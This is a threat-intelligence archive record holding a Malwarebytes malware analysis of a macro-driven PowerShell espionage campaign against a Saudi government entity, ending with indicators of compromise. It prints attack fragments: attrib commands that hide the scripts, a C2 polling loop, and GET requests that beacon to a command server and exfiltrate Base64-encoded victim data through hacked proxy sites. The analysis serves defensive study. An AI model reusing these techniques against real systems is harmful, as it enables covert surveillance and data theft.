{
	"id": "091fe8d9-152f-4e88-b930-f2fda419d446",
	"created_at": "2026-04-06T00:22:38.324598Z",
	"updated_at": "2026-04-10T13:12:16.569374Z",
	"deleted_at": null,
	"sha1_hash": "ae77ae44f928145c03c6e57eba130b647209b380",
	"title": "Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 536495,
	"plain_text": "Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity\r\nBy Malwarebytes Labs\r\nPublished: 2017-09-25 · Archived: 2026-04-05 23:18:03 UTC\r\nWe recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.\r\nIn our previous research, we detailed how an information stealer Trojan was deployed via a Word macro in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.\r\nThis new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites acting as proxies for the command and control server.\r\nThe malicious script fingerprints the victim’s machine and can receive any command, which it runs via PowerShell.\r\nIn this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.\r\nCovert delivery and persistence\r\nThe decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content”, stating that the document is in protected view (which is actually true).\r\nA high-level static analysis summary of this document reveals that it includes a macro as well as several Base64-encoded strings.\r\nOLE:MAS--B-- target.doc (Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/\r\nPage 1 of 8\r\nOne of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering the corresponding registry keys with values of “1”, meaning: Enable All (ref).\r\nThe VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class.\r\nIt then proceeds to retrieve a stream of data from the Pastebin website using its own proxy.\r\nThe data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.\r\nThis VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:\r\nattrib +s +h \"C:\\Users\\public\\documents\\NTSTATS.ps1\"\r\nattrib +s +h \"C:\\Users\\public\\documents\\NTSTATS.vbs\"\r\nEspionage and exfiltration\r\nThat PowerShell script also has the same instructions to lower Office’s security settings but, more importantly, is used to exfiltrate data and communicate with the command and control server.\r\nA unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).\r\nGET http://144.76.109[.]88/al/?action=getCommand\u0026id=[user ID] HTTP/1.1\r\nA function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).\r\nAnother function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:\r\nwhile ($true){ getCommand $key; start-sleep -Seconds 300 }\r\nThe malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.\r\nThe eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function.\r\nThe transmission of data is done via Base64-encoded strings, one for the user ID (.key file) and one for the exfiltrated data.\r\nGET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=[removed]== HTTP/1.1\r\nHost: www.wmg-global\r\nThe parameters passed on the URL in the Base64 format:\r\naction=saveResult\u0026id=[removed]\u0026cmd=2\u0026chunk=last\u0026res=[removed]=\r\nDecoding the value in the variable “res”, we get the following info.\r\nConnection-specific DNS Suffix . : [removed] Description . . . . . . . . . . . : [removed] Physical A\r\nScript based attack and protection\r\nThis attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2), which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.\r\nRelying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it is, not to mention more likely to stay undetected by antivirus engines. At the same time, it needs to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would.\r\nMalwarebytes users are already protected against this attack thanks to our signature-less engine.\r\nIndicators of compromise\r\nScripts:\r\nC:\\Users\\public\\documents\\NTSTATS.ps1\r\nC:\\Users\\public\\documents\\NTSTATS.vbs\r\nC2:\r\n144.76.109[.]88/al/\r\nProxies:\r\nlarsson-elevator[.]com/plugins/xmap/com_k2/com.php?c=\r\nspearhead-training[.]com/action/point2.php?c= i\r\nSource: https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/"
	],
	"report_names": [
		"elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity"
	],
	"threat_actors": [],
	"ts_created_at": 1775434958,
	"ts_updated_at": 1775826736,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae77ae44f928145c03c6e57eba130b647209b380.pdf",
		"text": "https://archive.orkl.eu/ae77ae44f928145c03c6e57eba130b647209b380.txt",
		"img": "https://archive.orkl.eu/ae77ae44f928145c03c6e57eba130b647209b380.jpg"
	}
}